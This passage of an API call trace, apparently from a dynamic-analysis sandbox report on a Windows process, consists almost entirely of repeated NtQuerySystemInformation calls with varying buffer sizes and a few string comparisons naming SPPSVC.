returned 20 [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0221.194] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0221.205] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0221.216] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0221.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe660, Length=0x28, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6d0, Length=0x28, ResultLength=0x0) [0221.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x28, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe630, Length=0x20, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe830, Length=0x38, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe6b0, Length=0x20, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe640, Length=0x20, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0221.449] NtQuerySystemInformation 